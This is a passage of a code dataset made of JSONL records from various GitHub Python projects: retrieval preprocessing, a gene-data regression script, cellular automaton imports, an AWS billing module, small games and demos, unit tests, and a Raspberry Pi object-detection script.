df[\"ans_len\"] = ans_lens\n df[\"ans_sub_id\"] = ans_sub_ids\n \n return df\n\ndef build_biencoder_data(dqa_split, bm25, set_ques, no_hneg, no_search):\n \"\"\"\n Build train, val, test, dataframe used for biencoder training\n \"\"\"\n qa_ids = []\n neg_ids = []\n search_ids = []\n q_texts = dqa_split['question'].tolist()\n q_bm25texts = dqa_split['bm25_question'].tolist()\n count = 0\n ans_ids = dqa_split['ans_id'].tolist()\n ids = [i for i in range(bm25.corpus_size)]\n for i in range(len(q_texts)):\n if q_texts[i] in set_ques:\n qa_ids.append(i)\n q_bm25 = q_bm25texts[i].split(\" \")\n bm25_ids = bm25.get_top_n(q_bm25, ids, n=no_search)\n if ans_ids[i] in bm25_ids:\n count += 1\n \n neg = bm25_ids[:(no_hneg+1)]\n if ans_ids[i] in neg:\n neg.remove(ans_ids[i])\n \n neg = neg[:no_hneg]\n neg_ids.append(neg)\n search_ids.append(bm25_ids)\n print(count/len(qa_ids)) \n df = dqa_split.loc[qa_ids]\n df['neg_ids'] = neg_ids\n df['search_ids'] = search_ids\n return df\n\ndef build_short_data(df, dcorpus, limited_length = 234):\n \"\"\"\n Build short data\n \"\"\"\n ids = [i for i in range(len(df)) if dcorpus['len'][df['ans_id'][i]] <= limited_length]\n dshort = df.loc[ids].copy(deep= True).reset_index(drop=True)\n return dshort\n\ndef build_general_data(dqa, bm25, set_ques, no_hneg, no_search):\n \"\"\"\n Build general train, test, val dataframe\n \"\"\"\n qa_ids = []\n neg_ids = []\n search_ids = []\n q_texts = dqa['question'].tolist()\n q_bm25texts = dqa['bm25_question'].tolist()\n ans_ids = dqa['ans_id'].tolist()\n ids = [i for i in range(bm25.corpus_size)]\n count = 0\n \n for i in range(len(q_texts)):\n if q_texts[i] in set_ques:\n qa_ids.append(i)\n q_bm25 = q_bm25texts[i].split(\" \")\n ans_id = [int(x) for x in ans_ids[i].split(\", \")]\n bm25_ids = bm25.get_top_n(q_bm25, ids, n= no_search)\n search_ids.append(bm25_ids)\n \n for a_id in ans_id:\n if a_id in bm25_ids:\n bm25_ids.remove(a_id)\n neg_id = bm25_ids[:no_hneg]\n neg_ids.append(neg_id)\n if len(bm25_ids) == (no_search - len(ans_id)):\n count += 1 \n \n df = dqa.loc[qa_ids]\n df['neg_ids'] = neg_ids\n df['search_ids'] = search_ids\n print(count/len(qa_ids))\n return df","repo_name":"coangquang/legal_retrieval","sub_path":"src/dpr/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":23463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72290021541","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 29 16:36:09 2020\r\n\r\n@author: LilyHeAsamiko\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom sklearn import preprocessing\r\nfrom scipy import stats\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n#regression on TF\r\ndataset = pd.read_csv(r'/Users/he/Downloads/WiML-master/MAdata_DGinMCout.txt',sep='\\t', header = 0)\r\norigindata = np.exp(dataset)\r\ndataset1 = pd.read_csv(r'/Users/he/Downloads/WiML-master/raw_data_DGinMCout.tsv',sep='\\t', header = 0)\r\nfadata = pd.read_csv(r'/Users/he/Downloads/WiML-master/Alignment_for_family_PTHR11679_SF35.txt',sep='\\t', header = 0)\r\n\r\n#X = origindata\r\n#X.iloc[0:25,0] = dataset1.iloc[0:25,5]\r\n#X.iloc[0:25,1] = dataset1.iloc[25:50,5]\r\n#X.iloc[0:25,2] = dataset1.iloc[50:75,5]\r\nX= np.zeros((np.shape(dataset)))\r\nX[0:25,0] = dataset1.iloc[0:25,5]\r\nX[0:25,1] = dataset1.iloc[25:50,5]\r\nX[0:25,2] = dataset1.iloc[50:75,5]\r\n\r\nN,c = np.shape(origindata)\r\n#compare V1: dg_v, V2: dg_c\r\nbeta = np.dot(X.T,origindata)/N\r\nbeta = np.array(beta)\r\nbeta0 = beta\r\nsteps = 100\r\nbtemp = 0.1\r\ndb = 0.1\r\nlse = np.ones(np.shape(origindata))*10**5\r\nres = np.zeros((c,steps))\r\n#regression\r\nfor b in range(c):\r\n for s in range(steps):\r\n# temp = btemp*X.iloc[:,b]\r\n# temp = np.unique((np.array(origindata.iloc[:,b]).reshape(N,1)-temp.reshape(N,1)-np.random.normal(0,1,N).reshape(N,1)))**2\r\n# temp = np.array(btemp*X[:,b])\r\n# temp = (np.array(origindata.iloc[:,b])-temp-np.random.normal(0,1,N).T)**2\r\n e = np.random.normal(0,1,N).T\r\n temp = (np.array(origindata.iloc[:,b])-np.array(btemp*X[:,b])-e)**2\r\n temp[np.isnan(temp)]=0\r\n# if sum(temp.reshape(N,1) - lse.reshape(N,1))<0:\r\n if sum(temp - lse[:,b])<0:\r\n beta[b,b] = btemp\r\n btemp += db\r\n lse[:,b] = temp \r\n res[b,s] = np.sqrt(sum(lse[:,b])/N)\r\n else:\r\n btemp = (btemp +db)/2\r\n e = np.random.normal(0,1,N).T\r\n temp= (np.array(origindata.iloc[:,b])-np.array(btemp*X[:,b])-e)**2\r\n if sum(temp - lse[:,b])<0:\r\n beta[b,b] = btemp\r\n btemp += db\r\n lse[:,b] = temp \r\n res[b,s] = np.sqrt(sum(lse[:,b])/N)\r\n else:\r\n res[b,s] = np.sqrt(res[b,s-1]/N)\r\n # temp[np.isnan(temp)]=0\r\n# res[b,s] = np.mean(res[b,0:s-1]/s)\r\nC = np.corrcoef(X,X)\r\nplt.pcolor(C[0:25,0:25])\r\nplt.title('correlation of three cells TF')\r\nLD = np.zeros((np.shape(origindata)))\r\n#LD score:\r\nfor i in range(c):\r\n LD[:,i] = origindata.iloc[:,i]**2+origindata.iloc[:,i]*origindata.iloc[:,np.mod(i+1,3)]+origindata.iloc[:,i]*origindata.iloc[:,np.mod(i+2,3)]\r\nplt.pcolor(LD)\r\nplt.title('LD_Score of three cells TF')\r\n \r\nplt.scatter(origindata, np.dot(X,beta))\r\nplt.title('three cells TF regression')\r\n\r\n\r\n#Compare enrichment of fa dataset(as the sequence is not complete but only alignment data, there we compare enrichment only on family fasta sequence)\r\nStr_Tnig = np.array(fadata.iloc[0:125],dtype = str)\r\nStr_Onil = np.array(fadata.iloc[127:252],dtype = str)\r\n#Common allele:\r\nrows = np.shape(Str_Onil)[0] \r\ncols = len(str(Str_Onil[0,:]))\r\nco = np.zeros((rows, cols))\r\ncE = 0\r\nS = ['A','R','N','D','C','Q','E','G','H','I','L','K','M','F','P','S','T','W','Y','V']\r\nfor i in range(np.shape(Str_Onil)[0]):\r\n co[i,:] = str(Str_Onil[i,:])==str(Str_Tnig[i,:])\r\n cE += sum(co[i,:]>0)\r\nM = rows*cols \r\nEnrichment_Tnig_Onil = np.zeros((rows, 2,2))\r\nTnigID = np.zeros((rows, cols,len(S)))\r\nOnilID = TnigID \r\nfor i in range(rows):\r\n for s in range(len(S)):\r\n# TnigID[i,:,s] = str(Str_Tnig[i,:])[~co[i,:]]==S[s]\r\n# OnilID[i,:,s] = str(Str_Onil[i,~co[i,:]]==S[s]\r\n# OnilID[i,:,s] = str(Str_Onil[i,:])[~co[i,:]]==S[s]\r\n #temp1 = str(Str_Tnig[i,])[:]\r\n TnigID[i,:,s] = str(Str_Tnig[i,]).find(S[s])\r\n #print(len(temp1))\r\n #temp2 = str(Str_Onil[i,])[:]\r\n #print(len(temp2))\r\n OnilID[i,:,s] = str(Str_Onil[i,]).find(S[s])\r\n #tempTid = TnigID[i,:,s]>=0\r\n #tempOid = OnilID[i,:,s]>=0\r\n #tempc = np.corrcoef(TnigID[i,tempTid,s],OnilID[i,tempOid,s])\r\n #tempc[np.isnan(tempc)] = 0\r\n #Enrichment_Tnig_Onil[i,s,:,:] = tempc\r\n tempTid = TnigID[i,:,:]>=0\r\n tempOid = OnilID[i,:,:]>=0\r\n tempc = np.corrcoef(TnigID[i,tempTid],OnilID[i,tempOid])\r\n tempc[np.isnan(tempc)] = 0\r\n Enrichment_Tnig_Onil[i,:,:] = tempc\r\n\r\n#fig = plt.figure()\r\n#ax = fig.add_subplot(111,projection = '3d')\r\n#ax.scatter(np.linspace(0,2,10),np.linspace(0,2,10),Enrichment_Tnig_Onil.T)\r\nEnrichment1 = sum(Enrichment_Tnig_Onil[Enrichment_Tnig_Onil>0]**2)/cE/((sum(Enrichment_Tnig_Onil[Enrichment_Tnig_Onil<=0]**2))/(rows*cols-cE)+1)","repo_name":"LilyHeAsamiko/neurocomputation","sub_path":"Regulatory elements inferenced by TF/LD.py","file_name":"LD.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"8125726812","text":"# -*- coding: utf-8 -*-\n\"\"\"\nXentica core functionality is available via modules from this package.\n\nIn addition, you may use ``core`` package as a shortcut to the main\nclasses of the framework.\n\n- **Base classes**\n - ``core.CellularAutomaton`` →\n :class:`xentica.core.base.CellularAutomaton`\n - ``core.Experiment`` →\n :class:`xentica.core.experiment.Experiment`\n\n- **Lattices**\n - ``core.OrthogonalLattice`` →\n :class:`xentica.core.topology.lattice.OrthogonalLattice`\n\n- **Neighborhoods**\n - ``core.MooreNeighborhood`` →\n :class:`xentica.core.topology.neighborhood.MooreNeighborhood`\n - ``core.VonNeumannNeighborhood`` →\n :class:`xentica.core.topology.neighborhood.VonNeumannNeighborhood`\n\n- **Borders**\n - ``core.TorusBorder`` →\n :class:`xentica.core.topology.border.TorusBorder`\n - ``core.StaticBorder`` →\n :class:`xentica.core.topology.border.StaticBorder`\n\n- **Properties**\n - ``core.IntegerProperty`` →\n :class:`xentica.core.properties.IntegerProperty`\n - ``core.FloatProperty`` →\n :class:`xentica.core.properties.FloatProperty`\n - ``core.TotalisticRuleProperty`` →\n :class:`xentica.core.properties.TotalisticRuleProperty`\n - ``core.RandomProperty`` →\n :class:`xentica.core.properties.RandomProperty`\n\n- **Parameters**\n - ``core.Parameter`` →\n :class:`xentica.core.parameters.Parameter`\n\n- **Variables**\n - ``core.IntegerVariable`` →\n :class:`xentica.core.variables.IntegerVariable`\n - ``core.FloatVariable`` →\n :class:`xentica.core.variables.FloatVariable`\n\nThe classes listed above are all you need to build CA models and\nexperiments with Xentica, unless you are planning to implement custom\ncore features like new lattices, borders, etc.\n\n\"\"\"\nfrom xentica.core.base import CellularAutomaton\nfrom xentica.core.properties import (\n IntegerProperty,\n FloatProperty,\n TotalisticRuleProperty,\n RandomProperty,\n)\nfrom xentica.core.variables import (\n IntegerVariable, FloatVariable,\n)\nfrom xentica.core.parameters import (\n Parameter,\n)\nfrom xentica.core.topology.lattice import (\n OrthogonalLattice,\n)\nfrom xentica.core.topology.neighborhood import (\n MooreNeighborhood, VonNeumannNeighborhood\n)\nfrom xentica.core.topology.border import (\n TorusBorder, StaticBorder,\n)\nfrom xentica.core.experiment import Experiment\n\n__all__ = [\n 'CellularAutomaton',\n 'IntegerProperty',\n 'FloatProperty',\n 'TotalisticRuleProperty',\n 'RandomProperty',\n 'Parameter',\n 'IntegerVariable',\n 'FloatVariable',\n 'OrthogonalLattice',\n 'MooreNeighborhood',\n 'VonNeumannNeighborhood',\n 'TorusBorder',\n 'StaticBorder',\n 'Experiment',\n]\n","repo_name":"a5kin/xentica","sub_path":"xentica/core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"35"} +{"seq_id":"40702347756","text":"import datetime\nimport time\n\nimport pandas as pd\n\nfrom bill_calculator_hep.AWSBillAnalysis import AWSBillCalculator\n\nfrom decisionengine.framework.modules import Source\nfrom decisionengine.framework.modules.Source import Parameter\nfrom decisionengine_modules.AWS.sources import DEAccountContants\n\n\n@Source.supports_config(\n Parameter(\n \"billing_configuration\",\n type=dict,\n comment=\"\"\"Configuration required to get AWS billing information. Supports the layout:\n\n {\n 'AWSRnDAccountConstants': {\n 'lastKnownBillDate': '08/01/16 00:00', # '%m/%d/%y %H:%M'\n 'balanceAtDate': 3839.16, # $\n 'accountName': 'RnD',\n 'accountNumber': 159067897602,\n 'credentialsProfileName': 'BillingRnD',\n 'applyDiscount': True, # DLT discount does not apply to credits\n 'costRatePerHourInLastSixHoursAlarmThreshold': 2, # $ / h # $10/h\n 'costRatePerHourInLastDayAlarmThreshold': 2, # $ / h # $10/h\n 'emailReceipientForAlarms': 'fermilab-cloud-facility-rnd@fnal.gov'\n }\n }\"\"\",\n ),\n Parameter(\"dst_dir_for_s3_files\", type=str, comment=\"Directory for AWS billing files\"),\n Parameter(\"verbose_flag\", type=bool),\n)\n@Source.produces(AWS_Billing_Info=pd.DataFrame, AWS_Billing_Rate=pd.DataFrame)\nclass BillingInfo(Source.Source):\n def __init__(self, config):\n super().__init__(config)\n acconts_config_file = config[\"billing_configuration\"]\n self.billing_files_location = config[\"dst_dir_for_s3_files\"]\n self.verbose_flag = int(config[\"verbose_flag\"])\n # Load known accounts configuration\n account_dict = DEAccountContants.load_constants(acconts_config_file)\n self.accounts = []\n for val in account_dict.values():\n self.accounts.append(DEAccountContants.AccountConstants(val))\n\n def acquire(self):\n \"\"\"\n Method to be called from Task Manager.\n redefines acquire from Source.py\n Acquire AWS billing info and return as pandas frame\n\n :rtype: :obj:`~pd.DataFrame`\n \"\"\"\n\n # get data for all accounts\n self.logger.debug(\"in BillingInfo acquire\")\n data = []\n datarate = []\n globalConf = {\n \"graphite_host\": \"dummy\",\n \"graphite_context_billing\": \"dummy\",\n \"outputPath\": self.billing_files_location,\n \"accountDirs\": 1,\n }\n for i in self.accounts:\n constantsDict = {\n \"credentialsProfileName\": i.credentialsProfileName,\n \"accountNumber\": i.accountNumber,\n \"bucketBillingName\": i.bucketBillingName,\n \"lastKnownBillDate\": i.lastKnownBillDate,\n \"balanceAtDate\": i.balanceAtDate,\n \"applyDiscount\": i.applyDiscount,\n }\n try:\n calculator = AWSBillCalculator(i.accountName, globalConf, constantsDict, self.logger)\n lastStartDateBilledConsideredDatetime, CorrectedBillSummaryDict = calculator.CalculateBill()\n self.logger.debug(f\"lastStartDateBilledConsideredDatetime: {lastStartDateBilledConsideredDatetime}\")\n self.logger.debug(f\"CorrectedBillSummaryDict: {CorrectedBillSummaryDict}\")\n # data is a list, CorrectedBillSummaryDict is a dict, so we have to append it as a list of dict.\n # data += calculator.CorrectedMonthlyBillSummaryList\n data += [CorrectedBillSummaryDict]\n #\n # This is the code to calculate 6hr and 24hr spend rate\n dateNow = datetime.datetime.today()\n # Get cost in the last 6 hours\n sixHoursBeforeLastDateBilledDatetime = lastStartDateBilledConsideredDatetime - datetime.timedelta(\n hours=6\n )\n calculator.setLastKnownBillDate(sixHoursBeforeLastDateBilledDatetime.strftime(\"%m/%d/%y %H:%M\"))\n newLastStartDateBilledDatetime, CorrectedBillSummarySixHoursBeforeDict = calculator.CalculateBill()\n costInLastSixHours = CorrectedBillSummarySixHoursBeforeDict[\"Total\"]\n costRatePerHourInLastSixHours = costInLastSixHours / 6\n # Get cost in the last 24 hours\n oneDayBeforeLastDateBilledDatetime = lastStartDateBilledConsideredDatetime - datetime.timedelta(\n hours=24\n )\n calculator.setLastKnownBillDate(oneDayBeforeLastDateBilledDatetime.strftime(\"%m/%d/%y %H:%M\"))\n newLastStartDateBilledDatetime, CorrectedBillSummaryOneDayBeforeDict = calculator.CalculateBill()\n\n costInLastDay = CorrectedBillSummaryOneDayBeforeDict[\"Total\"]\n costRatePerHourInLastDay = costInLastDay / 24\n dataDelay = int(\n (time.mktime(dateNow.timetuple()) - time.mktime(lastStartDateBilledConsideredDatetime.timetuple()))\n / 3600\n )\n\n dataratedict = {\n \"accountName\": i.accountName,\n \"lastStartDateBilledConsideredDatetime\": lastStartDateBilledConsideredDatetime,\n \"dataDelay\": dataDelay,\n \"costInLastSixHours\": costInLastSixHours,\n \"costInLastDay\": costInLastDay,\n \"costRatePerHourInLastSixHours\": costRatePerHourInLastSixHours,\n \"costRatePerHourInLastDay\": costRatePerHourInLastDay,\n }\n datarate += [dataratedict]\n if self.verbose_flag:\n self.logger.debug(\"---\")\n self.logger.debug(\n f\"Alarm Computation for {calculator.accountName} Account Finished at {time.strftime('%c')}\"\n )\n self.logger.debug(\"\")\n self.logger.debug(\n f\"Last Start Date Billed Considered: {lastStartDateBilledConsideredDatetime.strftime('%m/%d/%y %H:%M')}\"\n )\n self.logger.debug(f\"Now {dateNow.strftime('%m/%d/%y %H:%M')}\")\n self.logger.debug(f\"delay between now and Last Start Date Billed Considered in hours {dataDelay}\")\n self.logger.debug(\n f\"Six hours before that: {sixHoursBeforeLastDateBilledDatetime.strftime('%m/%d/%y %H:%M')}\"\n )\n self.logger.debug(\n f\"One day before that: {oneDayBeforeLastDateBilledDatetime.strftime('%m/%d/%y %H:%M')}\"\n )\n self.logger.debug(\n f\"Adjusted Total Now from Date of Last Known Balance: ${CorrectedBillSummaryDict['Total']}\"\n )\n self.logger.debug(\"\")\n self.logger.debug(f\"Cost In the Last Six Hours: ${costInLastSixHours}\")\n self.logger.debug(f\"Cost Rate Per Hour In the Last Six Hours: ${costRatePerHourInLastSixHours} / h\")\n self.logger.debug(\"\")\n self.logger.debug(f\"Cost In the Last Day: ${costInLastDay}\")\n self.logger.debug(f\"Cost Rate Per Hour In the Last Day: ${costRatePerHourInLastDay} / h\")\n self.logger.debug(\"---\")\n self.logger.debug(\"\")\n\n except Exception as detail:\n self.logger.exception(\"Exception in AWS BillingInfo call to acquire\")\n raise Exception(detail)\n\n return {\"AWS_Billing_Info\": pd.DataFrame(data), \"AWS_Billing_Rate\": pd.DataFrame(datarate)}\n\n\nSource.describe(\n BillingInfo,\n sample_config={\n \"billing_configuration\": \"/etc/decisionengine/modules.conf/AccountConstants_my.py\",\n \"dst_dir_for_s3_files\": \"/var/lib/decisionengine/awsfiles\",\n },\n)\n","repo_name":"HEPCloud/decisionengine_modules","sub_path":"src/decisionengine_modules/AWS/sources/BillingInfo.py","file_name":"BillingInfo.py","file_ext":"py","file_size_in_byte":7821,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"33948648146","text":"import pygame\nfrom settings import Settings\n\nclass Ship:\n \"\"\"A class to manage the ship\"\"\"\n\n def __init__(self, galaga_game):\n \"\"\"Initialize the ship and set its starting position\"\"\"\n self.screen = galaga_game.screen\n self.screen_rect = galaga_game.screen.get_rect()\n self.settings = galaga_game.settings\n self.galaga_game = galaga_game\n\n # Load ths ship image and get its rect\n self.image = pygame.image.load(self.settings.ship_image) \n self.rect = self.image.get_rect()\n\n # Start each new ship at the bottom center of the screen.\n self.rect.midbottom = self.screen_rect.midbottom\n\n # Move right flag; start with a ship that's not moving.\n self.moving_right = False \n self.moving_left = False\n\n def update(self):\n \"\"\"Update the ship's position based on the movement flag\"\"\"\n if self.moving_right:\n if self.rect.x <= self.galaga_game.screen_width - self.rect.width:\n self.rect.x += self.settings.ship_speed\n elif self.moving_left:\n if self.rect.x >= 0:\n self.rect.x -= self.settings.ship_speed\n\n def blitme(self):\n \"\"\"Draw the ship at its current location.\"\"\"\n self.screen.blit(self.image, self.rect)\n\n def center_ship(self):\n \"\"\"Center the ship on the screen\"\"\"\n self.rect.midbottom = self.screen_rect.midbottom\n self.x = float(self.rect.x)\n\n\n ","repo_name":"daviddelavega/GalagaPythonGame","sub_path":"galaga/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28968922841","text":"from unittest.case import SkipTest\n\nimport numpy as np\n\nfrom aspire.image import Image\nfrom aspire.utils import gaussian_2d, utest_tolerance\nfrom aspire.utils.coor_trans import grid_2d\nfrom aspire.utils.random import randn\n\n\nclass Steerable2DMixin:\n def testIndices(self):\n ell_max = self.basis.ell_max\n k_max = self.basis.k_max\n\n indices = self.basis.indices()\n\n i = 0\n\n for ell in range(ell_max + 1):\n if ell == 0:\n sgns = [1]\n else:\n sgns = [1, -1]\n\n for sgn in sgns:\n for k in range(k_max[ell]):\n self.assertTrue(indices[\"ells\"][i] == ell)\n self.assertTrue(indices[\"sgns\"][i] == sgn)\n self.assertTrue(indices[\"ks\"][i] == k)\n\n i += 1\n\n def testGaussianExpand(self):\n # Offset slightly\n x0 = 0.50\n y0 = 0.75\n\n # Want sigma to be as large as possible without the Gaussian\n # spilling too much outside the central disk.\n sigma = self.L / 8\n im1 = gaussian_2d(\n self.L, x0=x0, y0=y0, sigma_x=sigma, sigma_y=sigma, dtype=self.dtype\n )\n\n coef = self.basis.expand(im1)\n im2 = self.basis.evaluate(coef)\n\n if isinstance(im2, Image):\n im2 = im2.asnumpy()\n im2 = im2[0]\n\n # For small L there's too much clipping at high freqs to get 1e-3\n # accuracy.\n if self.L < 32:\n atol = 1e-2\n else:\n atol = 1e-3\n\n self.assertTrue(im1.shape == im2.shape)\n self.assertTrue(np.allclose(im1, im2, atol=atol))\n\n def testIsotropic(self):\n sigma = self.L / 8\n im = gaussian_2d(self.L, sigma_x=sigma, sigma_y=sigma, dtype=self.dtype)\n\n coef = self.basis.expand(im)\n\n ells = self.basis.indices()[\"ells\"]\n\n energy_outside = np.sum(np.abs(coef[ells != 0]) ** 2)\n energy_total = np.sum(np.abs(coef) ** 2)\n\n energy_ratio = energy_outside / energy_total\n\n self.assertTrue(energy_ratio < 0.01)\n\n def testModulated(self):\n if self.L < 32:\n raise SkipTest\n\n ell = 1\n\n sigma = self.L / 8\n im = gaussian_2d(self.L, sigma_x=sigma, sigma_y=sigma, dtype=self.dtype)\n\n g2d = grid_2d(self.L)\n\n for trig_fun in (np.sin, np.cos):\n im1 = im * trig_fun(ell * g2d[\"phi\"])\n\n coef = self.basis.expand(im1)\n\n ells = self.basis.indices()[\"ells\"]\n\n energy_outside = np.sum(np.abs(coef[ells != ell]) ** 2)\n energy_total = np.sum(np.abs(coef) ** 2)\n\n energy_ratio = energy_outside / energy_total\n\n self.assertTrue(energy_ratio < 0.10)\n\n def testEvaluateExpand(self):\n coef1 = randn(self.basis.count, seed=self.seed)\n coef1 = coef1.astype(self.dtype)\n\n im = self.basis.evaluate(coef1)\n if isinstance(im, Image):\n im = im.asnumpy()\n coef2 = self.basis.expand(im)[0]\n\n self.assertTrue(coef1.shape == coef2.shape)\n self.assertTrue(np.allclose(coef1, coef2, atol=utest_tolerance(self.dtype)))\n\n def testAdjoint(self):\n u = randn(self.basis.count, seed=self.seed)\n u = u.astype(self.dtype)\n\n Au = self.basis.evaluate(u)\n if isinstance(Au, Image):\n Au = Au.asnumpy()\n\n x = randn(*self.basis.sz, seed=self.seed)\n x = x.astype(self.dtype)\n\n ATx = self.basis.evaluate_t(x)\n\n Au_dot_x = np.sum(Au * x)\n u_dot_ATx = np.sum(u * ATx)\n\n self.assertTrue(Au_dot_x.shape == u_dot_ATx.shape)\n self.assertTrue(np.isclose(Au_dot_x, u_dot_ATx))\n","repo_name":"yunpeng-shi/ASPIRE-Python","sub_path":"tests/_basis_util.py","file_name":"_basis_util.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"31280609196","text":"import sys\nfrom flask import Flask, jsonify, request, render_template\nfrom build_graphs import build_graphs \n# testfile = \"/Users/main/Desktop/Coding/castle_dash_test/dashboard_challenge/castle_users.json\"\n\napp = Flask(__name__)\napp.config['PROPAGATE_EXCEPTIONS'] = True\n\n@app.route('/')\ndef home():\n\treturn render_template(\"index.html\")\n\nif __name__ == '__main__':\n\tinput = sys.argv[1]\n\tprint('input file name is ==>', input)\n\tbuild_graphs(input)\n\n\tapp.run(debug=True, use_reloader=False)\n","repo_name":"tsyaeger/cstl_dashboard","sub_path":"dashboard_challenge/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30091726150","text":"from UI import Ui_Frame\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget\nfrom PyQt5.QtGui import QPainter, QBrush, QFont\nfrom PyQt5.QtCore import Qt, QRectF, QPoint, QRect\nimport sys, random, math\n\nclass Win(QMainWindow, Ui_Frame):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pushButton.clicked.connect(self.clickfoo)\n self.valueIsSet = False\n\n def clickfoo(self):\n self.dataInit()\n self.monteCarlo()\n self.update()\n\n def dataInit(self):\n self.valueIsSet = True\n self.N = int(self.lineEdit.text())\n self.P = int(self.lineEdit_2.text())\n\n def monteCarlo(self):\n allPoint = [[random.uniform(0, 1), random.uniform(0, 1)]\n for i in range(self.N)]\n counter = 0\n self.underPoint = []\n self.upperPoint = []\n for point in allPoint:\n if point[1] <= math.pow(point[0], self.P):\n counter += 1\n self.underPoint.append(point)\n else:\n self.upperPoint.append(point)\n Area = counter / self.N\n self.label_3.setText(\"面積大約為{}\".format(Area))\n\n def paintEvent(self, event):\n painter = QPainter(self)\n painter.setFont(QFont(\"Monospace\", 15))\n painter.setPen(Qt.white)\n painter.drawLine(600, 150, 1100, 150)\n painter.drawLine(600, 150, 600, 650)\n # draw Function\n if self.valueIsSet:\n for i in range(1000):\n tmp = i / 1000\n painter.drawPoint(600 + tmp * 500, 150 + math.pow(tmp, self.P) * 500)\n for point in self.underPoint:\n x = point[0]\n y = point[1]\n painter.drawPoint(600 + x * 500, 150 + y * 500)\n painter.setPen(Qt.red)\n for point in self.upperPoint:\n x = point[0]\n y = point[1]\n painter.drawPoint(600 + x * 500, 150 + y * 500)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = Win()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"eeeXun/homework","sub_path":"semester4/algorithm2-2/demo3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70198406821","text":"import math\nfrom collections import Counter\n\n \n\ndef solution(str1, str2):\n \n str1 = str1.upper()\n str2 = str2.upper()\n\n tmp = []\n tmp2 = []\n\n for i in range(0, len(str1)-1):\n if str1[i] == ' ' or str1[i+1] == ' ':\n continue\n if str1[i].isdigit() or str1[i+1].isdigit():\n continue\n if not(str1[i].isalpha()) or not(str1[i+1].isalpha()):\n continue\n\n tmp.append( str1[i] + str1[i+1] ) \n\n for i in range(0, len(str2)-1):\n if str2[i] == ' ' or str2[i+1] == ' ':\n continue\n if str2[i].isdigit() or str2[i+1].isdigit():\n continue\n if not(str2[i].isalpha()) or not(str2[i+1].isalpha()):\n continue\n\n tmp2.append( str2[i] + str2[i+1] )\n\n \n #print(tmp)\n #print(tmp2)\n\n\n if len(tmp) == 0 and len(tmp2) == 0: # 숫자나 공백, 특문때문에 전부 제거된 경우 예외처리 \n ans = 65536\n return ans\n else:\n c1 = Counter(tmp)\n c2 = Counter(tmp2)\n \n intersec = c1 & c2\n intersec = sum(list(intersec.values()))\n union = c1 | c2\n union = sum(list(union.values()))\n \n ans = intersec/union * 65536\n '''\n common = 0\n\n adding = 0\n\n \n\n tmp3 = tmp2\n\n # 두 리스트 공통 찾는 로직 ( set을 쓸 수가 없음 )\n\n for i in range(len(tmp)):\n for j in range(len(tmp3)):\n if tmp[i] == tmp3[j]:\n common += 1\n tmp3[j] == ''\n break\n\n \n\n adding = len(tmp) + len(tmp2) - common\n\n \n\n a = common\n\n b = adding\n \n #print(common, adding)\n\n ans = a/b * 65536\n\n ans = math.floor(ans) # 내림 \n\n '''\n\n '''\n\n tmp = set(tmp)\n\n tmp2 = set(tmp2)\n\n \n\n print(tmp)\n\n print(tmp2)\n\n \n\n a = len(tmp & tmp2) # 교집합\n\n b = len(tmp | tmp2) # 합집합\n\n \n\n ans = a/b * 65536\n\n '''\n\n #print(int(ans))\n return int(ans)\n\n\n#solution('FRANCE', 'french') \n#solution('handshake', 'shake hands')\n#solution('aa1+aa2', 'AAAA12') \n#solution('E=M*C^2', 'e=m*c^2')\n","repo_name":"JuyeolRyu/CodingTest","sub_path":"백수/algorithm/카카오/2018 KaKao Blind Recruitment/young/[1차] 뉴스 클러스터링/[1차] 뉴스 클러스터링.py","file_name":"[1차] 뉴스 클러스터링.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71186578661","text":"import tflite_runtime.interpreter as interpreter\nimport numpy as np\nimport RPi.GPIO as GPIO\nimport cv2 as cv\nimport sys\nimport time\nimport math\nimport matplotlib.pyplot as plt\nimport smbus2\nfrom centroidtracker import CentroidTracker\nfrom threading import Thread\nfrom picamera2 import Picamera2\n\nclass VideoStream:\n def __init__(self):\n global imgW,imgH\n self.piCam = Picamera2()\n self.piCam.configure(self.piCam.create_preview_configuration())\n self.piCam.start()\n self.frame = []\n self.stopEx = False\n imgH,imgW = self.piCam.capture_array().shape[:2]\n # def start(self): #to run on a separate thread\n # Thread(target=self.update,args=()).start()\n # return self\n\n # def update(self):\n # while not self.stopEx:\n # self.frame = self.piCam.capture_array()[:,:,:3]\n\n def update(self):\n self.frame = cv.rotate(self.piCam.capture_array()[:,:,:3],cv.ROTATE_180)\n \n def getInstance(self):\n return self\n\n def read(self):\n return np.array(self.frame.copy())\n\n def stop(self):\n self.stopEx = True\n \nclass Detect:\n def __init__(self, stream):\n global imgW,imgH\n labels = 'labelmap.txt'\n model_path = 'detect.tflite'\n \n self.is_tracking = False #TODO\n\n self.stream = stream\n self.model = 